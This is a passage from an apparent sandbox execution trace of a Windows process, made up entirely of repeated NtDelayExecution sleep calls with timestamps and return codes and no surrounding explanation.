(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.146] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.148] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.149] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.152] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.154] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.155] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.160] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.161] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.211] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.213] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.216] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.217] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.219] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.220] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.238] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.241] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.244] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.245] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.251] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.254] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.260] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.263] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.265] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.270] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.273] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.275] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.276] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.279] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.281] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.282] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.291] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.296] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.326] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.345] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.383] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.430] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.481] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.487] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.511] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.514] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.517] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.528] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.535] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.538] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.544] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.547] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.567] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.573] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.576] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.587] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.591] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.603] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.606] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.620] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.664] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.667] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.670] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.675] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.676] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.678] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.679] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.681] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.683] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.684] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.686] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.687] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.689] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.690] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.692] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.693] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.695] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.696] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.698] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.699] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.702] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.703] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.705] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.706] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.708] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.710] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.711] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.713] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.716] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.727] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.731] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.734] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.741] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.744] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.747] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.749] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.753] NtDelayExecution 